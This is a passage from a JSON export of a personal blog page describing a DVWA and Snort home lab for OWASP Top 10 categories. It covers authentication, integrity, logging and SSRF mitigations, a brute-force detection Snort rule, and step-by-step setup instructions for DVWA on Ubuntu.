wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"IAM\">7. Identification and Authentication Failures<\/h3>\n\n\n\n<p>This section is very heavy on password attacks. What sticks out here is just making sure that the appropriate policies are in place to counter password attacks. Having policies like\u2026<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Password length and complexity<\/li>\n\n\n\n<li>Password attempts<\/li>\n\n\n\n<li>Not having knowledge-based questions<\/li>\n\n\n\n<li>Not having multifactor authentication enabled<\/li>\n<\/ul>\n\n\n\n<p>Some other things to look out for are\u2026<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Using default credentials<\/li>\n\n\n\n<li>Reusing tokens\/ non-expiring tokens<\/li>\n<\/ul>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>DVWA also has a brute force section. I created the rule below as a small bonus to help Snort detect brute-force attacks.<\/p>\n\n\n\n<div class=\"wp-block-group is-layout-constrained wp-block-group-is-layout-constrained\">\n<p id=\"SnortBrute\"><strong>Brute Force detection Snort rule<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Can be further enhanced by adding http_method; content: \u201cPOST\u201d, as well as changing the \u201cFlow\u201d and \u201cFlowbit\u201d options, as well as using a more specific uricontent.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"Potential Brute Force Attack\";\\\nsid: 1000022;\\\nFlow: established,from_client;\\\nUricontent: \u201c\/vulnerabilities\/brute\u201d;\\\ndetection_filter: track by_src, count 5, seconds 60;\\\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SoftData\">8. Software and Data Integrity Failures<\/h3>\n\n\n\n<p>When it comes to this category, I immediately think of the hashes shown to you on a tool&#8217;s download screen.<\/p>\n\n\n\n<p>You are supposed to get the hash of the tool\/software\/update AFTER you download it and compare it to the hash shown on the site. They are supposed to match, and if they do not, it is a strong indicator that the software\/tool has been tampered with.<\/p>\n\n\n\n<p>An example of failure in this category is not having a hash AT ALL or any other way to check the integrity of what you are bringing into your environment.<\/p>\n\n\n\n<p>Here is an example of there being a hash when downloading a tool. I can use Pestudio, a tool I currently use for malware analysis.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"689\" height=\"503\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudioPic.png\" alt=\"\" class=\"wp-image-843\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudioPic.png 689w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudioPic-300x219.png 300w\" sizes=\"(max-width: 689px) 100vw, 689px\" \/><\/figure>\n\n\n\n<p>As I mentioned before, they give you a hash to compare against.<\/p>\n\n\n\n<p>Running \u201cGet-FileHash \u2026\u201d on the file path in PowerShell can give you the hash, as shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"712\" height=\"296\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudiohash.png\" alt=\"\" class=\"wp-image-844\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudiohash.png 712w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/pestudiohash-300x125.png 300w\" sizes=\"(max-width: 712px) 100vw, 712px\" \/><\/figure>\n\n\n\n<p>The hash we get in PowerShell seems to match the hash on the website, indicating that the zip file has not been tampered with.<\/p>\n\n\n\n<p>What about the stuff that is already running on our systems? We can verify the signatures of running applications\/processes. I know how to do this using a Sysinternals tool called Process Explorer. Inside Process Explorer, right-click on any process you want to verify, click on properties, and then click on the image tab. Here, there will be a Verify button to check if the signature is legit.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"568\" height=\"639\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/verifySig.png\" alt=\"\" class=\"wp-image-845\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/verifySig.png 568w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/verifySig-267x300.png 267w\" sizes=\"(max-width: 568px) 100vw, 568px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>On Linux, you will also want to make sure you are using safe and trusted repositories. There will be times when you can check hashes, and most Linux repos use PGP keys to sign their packages.<\/p>\n\n\n\n<p><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SecLog\">9. Security Logging and Monitoring Failures<\/h3>\n\n\n\n<p>Failure in this category can occur simply by not logging the basics. (failed and successful logins, high network activity, errors, web attacks\/recon, etc). Make sure your systems and their applications\/services are logging and forwarding to an SIEM. Do not store logs locally and continuously revise your detection\/alerting rules.<\/p>\n\n\n\n<p>A big one I see is not keeping all your logs in a certain consistent format. Sometimes, logs can also contain too little or too much information that can help an attacker. Make sure the logs and archive folders for older logs follow a consistent format, and that the folders have unique names so they do not overwrite each other.<\/p>\n\n\n\n<p class=\"has-zeever-bgsoft-background-color has-background\"><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SSRF\">10. SSRF<\/h3>\n\n\n\n<p>The final category will take us back to the first category. An example of Server-Side Request Forgery has already been shown.<\/p>\n\n\n\n<p class=\"has-zeever-bgsoft-background-color has-background\">Specifically, the Remote File Inclusion example.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"603\" height=\"35\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-1.png\" alt=\"\" class=\"wp-image-846\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-1.png 603w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-1-300x17.png 300w\" sizes=\"(max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<p>The main things that I see that make up a server-side request forgery are<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>An attacker is attempting to target a server that they do not have direct access to<\/strong>\n<ul class=\"wp-block-list\">\n<li>This can be because they are using a whitelist, Firewalls, or any other sort of ACLs to limit access to that server<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>There is a vulnerable web server between the attacker&#8217;s machine and the target server<\/strong>\n<ul class=\"wp-block-list\">\n<li>This server is whitelisted to communicate with the target server<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>The attacker will use specifically crafted URLs like the one shown above<\/strong>\n<ul class=\"wp-block-list\">\n<li>It will seem as if the server is attempting to access internal and external machines.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p>Now, the URL shown in that image is just the same web server collecting a file from itself via a different port. But the address can be either an internal or an external address.<\/p>\n\n\n\n<p><strong>Mitigations<\/strong><\/p>\n\n\n\n<p>Defense-in-depth<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Application\n<ul class=\"wp-block-list\">\n<li>Disable schemas such as file :\/\/, ftp:\/\/, and other dangerous schemas. Only allow HTTP and HTTPS<\/li>\n\n\n\n<li>Validate user input<\/li>\n\n\n\n<li>Make sure that a public IP address is trying to attempt the request.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Network\n<ul class=\"wp-block-list\">\n<li>Segment public-facing servers<\/li>\n\n\n\n<li>Ensure firewall policies are \u201cdeny by default\u201d and allow only the necessary internal traffic&nbsp;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html\">https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-22177b6a wp-block-group-is-layout-constrained\" style=\"padding-top:100px;padding-bottom:100px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" id=\"DVWA\">\n<h2 class=\"wp-block-heading has-text-align-left is-style-lineseparator zeever-animate zeever-move-right zeever-delay-1 has-zeever-primary-color has-text-color has-heading-2-font-size\">Setting up DVWA<\/h2>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-left zeever-animate zeever-move-right zeever-delay-3 has-zeever-secondary-color has-text-color has-tiny-font-size\" style=\"font-style:normal;font-weight:500;text-transform:uppercase\">How to quickly set up DVWA<\/h2>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Download the Ubuntu ISO from this link. <\/p>\n\n\n\n<p><a href=\"https:\/\/ubuntu.com\/download\/desktop\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/ubuntu.com\/download\/desktop<\/a><\/p>\n\n\n\n<p>You&#8217;ll have to click the green button and wait a bit for the download.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"697\" height=\"272\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/UbuntuDown.png\" alt=\"\" class=\"wp-image-1006\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/UbuntuDown.png 697w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/UbuntuDown-300x117.png 300w\" sizes=\"(max-width: 697px) 100vw, 697px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After getting the ISO, open VirtualBox, click Machine \u2192 New<\/p>\n\n\n\n<p>Put any name, it can be DVWA Ubuntu.<\/p>\n\n\n\n<p>Make sure the ISO image is the one you just downloaded. You can click on the checkbox for \u201cSkip Unattended Installation\u201d. Click Next.<\/p>\n\n\n\n<p>For the hardware screen, it depends on your hardware. You can leave it default, or bump it up to double the memory. Here I have 4 CPU Processors. You can leave it at 1 or 2.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"569\" height=\"265\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/Hardware.png\" alt=\"\" class=\"wp-image-1007\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/Hardware.png 569w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/Hardware-300x140.png 300w\" sizes=\"(max-width: 569px) 100vw, 569px\" \/><\/figure>\n\n\n\n<p>I just left the Virtual Hard Disk as the default. 25GB is enough.<\/p>\n\n\n\n<p>Then click finish on the summary screen. After that, you can start the VM.<\/p>\n\n\n\n<p>When asked for the preferred language, hover over it with your arrow keys, then press Enter. For me, it\u2019s \u201cEnglish\u201d. Click on \u201cInstall Ubuntu\u201d. Make sure you put your keyboard type. I did minimal installations. Click \u201cContinue.\u201d<\/p>\n\n\n\n<p>In the installation type window, click &#8220;Install Now.&#8221;<\/p>\n\n\n\n<p>Fill out the name, computer name, and password fields. Then move on when done. Copying the files may take a couple of minutes. Once it finishes, click on the restart button.<\/p>\n\n\n\n<p>Just wait for it to load back up, click \u201cEnter\u201d if it says to \u201cremove the media and hit enter.\u201d<\/p>\n\n\n\n<p>Then log in after that little reset.<\/p>\n\n\n\n<p>You can skip the pop-up window that asks whether you want to connect your online account and help improve Ubuntu.<\/p>\n\n\n\n<p>Open Firefox and search for DVWA.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"722\" height=\"427\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWASearch.png\" alt=\"\" class=\"wp-image-1008\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWASearch.png 722w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWASearch-300x177.png 300w\" sizes=\"(max-width: 722px) 100vw, 722px\" \/><\/figure>\n\n\n\n<p>Click on the first GitHub link as shown above. Once inside, click \u201cCode,\u201d then click the little copy button as shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"729\" height=\"427\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAURL.png\" alt=\"\" class=\"wp-image-1010\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAURL.png 729w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAURL-300x176.png 300w\" sizes=\"(max-width: 729px) 100vw, 729px\" \/><\/figure>\n\n\n\n<p>Open the terminal and make sure you have Git installed<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"509\" height=\"74\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptGit.png\" alt=\"\" class=\"wp-image-1009\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptGit.png 509w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptGit-300x44.png 300w\" sizes=\"(max-width: 509px) 100vw, 509px\" \/><\/figure>\n\n\n\n<p>After that, clone the repo<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"752\" height=\"99\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAClone.png\" alt=\"\" class=\"wp-image-1011\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAClone.png 752w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAClone-300x39.png 300w\" sizes=\"(max-width: 752px) 100vw, 752px\" \/><\/figure>\n\n\n\n<p>Apt Install MariaDB server<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"673\" height=\"93\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MariaDBInstall.png\" alt=\"\" class=\"wp-image-1012\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MariaDBInstall.png 673w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MariaDBInstall-300x41.png 300w\" sizes=\"(max-width: 673px) 100vw, 673px\" \/><\/figure>\n\n\n\n<p>Apt install MariaDB client<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"656\" height=\"73\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptmariadbclient.png\" alt=\"\" class=\"wp-image-1013\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptmariadbclient.png 656w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptmariadbclient-300x33.png 300w\" sizes=\"(max-width: 656px) 100vw, 656px\" \/><\/figure>\n\n\n\n<p>Apt install Apache2.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"548\" height=\"75\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/apache2Install.png\" alt=\"\" class=\"wp-image-1014\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/apache2Install.png 548w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/apache2Install-300x41.png 300w\" sizes=\"(max-width: 548px) 100vw, 548px\" \/><\/figure>\n\n\n\n<p>Apt install libapache2<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"694\" height=\"39\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptlibApache.png\" alt=\"\" class=\"wp-image-1015\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptlibApache.png 694w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptlibApache-300x17.png 300w\" sizes=\"(max-width: 694px) 100vw, 694px\" \/><\/figure>\n\n\n\n<p>Install PHP-MySQL<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"631\" height=\"101\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallPhpMysql.png\" alt=\"\" class=\"wp-image-1016\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallPhpMysql.png 631w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallPhpMysql-300x48.png 300w\" sizes=\"(max-width: 631px) 100vw, 631px\" \/><\/figure>\n\n\n\n<p>Install PHP-gd<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"594\" height=\"64\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallphpgd.png\" alt=\"\" class=\"wp-image-1017\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallphpgd.png 594w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/aptinstallphpgd-300x32.png 300w\" sizes=\"(max-width: 594px) 100vw, 594px\" \/><\/figure>\n\n\n\n<p>After installing all of that, move DVWA into \/var\/www\/html<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"395\" height=\"37\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MvDVWA.png\" alt=\"\" class=\"wp-image-1018\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MvDVWA.png 395w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MvDVWA-300x28.png 300w\" sizes=\"(max-width: 395px) 100vw, 395px\" \/><\/figure>\n\n\n\n<p>Note: You\u2019ll have to use SUDO or switch to root.<\/p>\n\n\n\n<p>CD into the DVWA folder and run the command below<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"575\" height=\"26\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/cpconfDist.png\" alt=\"\" class=\"wp-image-1019\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/cpconfDist.png 575w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/cpconfDist-300x14.png 300w\" sizes=\"(max-width: 575px) 100vw, 575px\" \/><\/figure>\n\n\n\n<p>Use the command \u201cSudo mysql\u201d<\/p>\n\n\n\n<p>Run the 4 commands shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"706\" height=\"400\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/databaseCommands-1.png\" alt=\"\" class=\"wp-image-1028\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/databaseCommands-1.png 706w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/databaseCommands-1-300x170.png 300w\" sizes=\"(max-width: 706px) 100vw, 706px\" \/><\/figure>\n\n\n\n<p>You can test logging into the database as the user \u201cdvwa\u201d with the password \u201cp@ssw0rd\u201d in a new terminal window. You can run the command below to place the password on the terminal. Or run it with just -p, so the password is hidden.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"276\" height=\"62\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/dvwaUserPass.png\" alt=\"\" class=\"wp-image-1021\"\/><\/figure>\n\n\n\n<p>Do a quick restart of the services.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"611\" height=\"52\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/serviceRestart.png\" alt=\"\" class=\"wp-image-1022\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/serviceRestart.png 611w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/serviceRestart-300x26.png 300w\" sizes=\"(max-width: 611px) 100vw, 611px\" \/><\/figure>\n\n\n\n<p>Then navigate to \u201clocalhost\/DVWA\/setup.php\u201d on Firefox, and you\u2019ll be greeted with the setup page.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"831\" height=\"667\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage.png\" alt=\"\" class=\"wp-image-1023\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage.png 831w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage-300x241.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/setupPage-768x616.png 768w\" sizes=\"(max-width: 831px) 100vw, 831px\" \/><\/figure>\n\n\n\n<p>Scroll to the bottom and click the \u201cCreate \/ Reset Database\u201d button. After it creates the database, it\u2019ll redirect you to the main login page.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"688\" height=\"507\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/mainlogin.png\" alt=\"\" class=\"wp-image-1024\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/mainlogin.png 688w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/mainlogin-300x221.png 300w\" sizes=\"(max-width: 688px) 100vw, 688px\" \/><\/figure>\n\n\n\n<p>You can log in with Admin\/Password<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"924\" height=\"636\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside.png\" alt=\"\" class=\"wp-image-1025\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside.png 924w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside-300x206.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside-768x529.png 768w\" sizes=\"(max-width: 924px) 100vw, 924px\" \/><\/figure>\n\n\n\n<p>And that\u2019s it, analysts\/operators\/intruders, happy hacking.<\/p>\n\n\n\n<p>Note: If you want Snort, you can run \u201csudo apt install snort\u201d on the Ubuntu box. Then cd \/etc\/snort\/rules and vi \/ vim into \u201clocal.rules\u201d.&nbsp;&nbsp;<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Snort Rules Basic SNort Rule format DVWA Download You can follow along with how I did it or look at the official GitHub and see what other possibilities\/changes you can make to DVWA. https:\/\/github.com\/digininja\/DVWA Lab Brief Summary Configured the DVWA webserver with Snort IPS to demonstrate OWASP Top 10. Will bring up easily understandable vulnerabilities and their respective mitigation strategies, correlated with each category. I have also developed tailored Snort rules for the applicable vulnerabilities. Additional Helpful Links Snort 3 Rules Manual Snort 2 Rules Manual PCRE (Regex) Manual HTML URL Encoding Reference OWASP Top 10 This lab was originally<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"class_list":["post-832","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/832","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=832"}],"version-history":[{"count":77,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/832\/revisions"}],"predecessor-version":[{"id":1147,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/832\/revisions\/1147"}],"wp:attachment":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}